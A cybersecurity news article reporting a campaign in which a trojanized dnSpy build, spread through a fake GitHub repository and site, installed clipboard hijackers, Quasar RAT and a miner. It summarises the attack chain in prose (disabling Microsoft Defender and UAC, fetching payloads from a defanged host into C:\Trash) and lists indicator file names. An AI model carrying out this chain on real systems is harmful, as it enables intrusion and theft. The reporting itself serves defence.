Cybersecurity Researchers and Developers Targeted in a Malicious Campaign Spreading dnSpy
Cyberattacks Leveraging Fake dnSpy Delivered a Cocktail of Malware.
Last updated on January 10, 2022
A malware campaign distributing a malicious variant of the dnSpy app was wreaking havoc last week targeting developers and cybersec researchers. The threat actors’ goal was to perform crypto stealers, RATs, and miners’ installation.
Last week, a GitHub repository containing a dnSpy variant that deploys a malware cocktail was created by a threat actor. The malware range consisted of clipboard hijackers, a Quasar RAT, various payloads, and a miner. The clipboard hijackers served for cryptocurrency stealing purposes.
Upon the launching of the dnSpy app, a series of commands are executed. These will eventually result in scheduled task creation. These tasks use elevated permission to run.
The researchers from MalwareHunterTeam shared a commands list with the same publication mentioned above that shows what types of malicious actions the malware does. Thus, it performs Microsoft Defender disablement, it downloads curl.exe to %windir%\system32\curl.exe. by means of bitsadmin.exe, then a variety of payloads are downloaded via the two previous executables in the C:\Trash folder and then they are launched. Finally, the User Account Control is disabled.
http://4api[.]net/ is the place from where those payloads were downloaded and these consist of many malware such as: %windir%\system32\curl.exe, C:\Trash\c.exe – Unknown [VirusTotal], C:\Trash\ck.exe – Unknown, C:\Trash\cbot.exe – Clipboard Hijacker [VirusTotal], C:\Trash\cbo.exe – Unknown [VirusTotal], C:\Trash\qs.exe – Quasar RAT [VirusTotal], C:\Trash\m.exe – Miner [VirusTotal], C:\Trash\d.exe, and C:\Trash\nnj.exe – Unknown.
What’s worth mentioning about clipboard hijacker (cbot.exe) is the use of cryptocurrency addresses from past cyberattacks. These are:
The GitHub repository and the dnSpy[.]net employed in this malicious campaign are for the moment shut down. Nevertheless, the risk of potential popular projects clones remains.
What Is dnSpy?
dnSpy stands for a well-known .NET assembly editor and debugger that serves the purpose of modifying, debugging, and decompiling .NET programs. This app is mainly used by researchers in the cybersecurity field when inspecting .NET malware.
Hi! My name is Andra and I am a passionate writer interested in a variety of topics. I am curious about the cybersecurity world and what I want to achieve through what I write is to keep you curious too!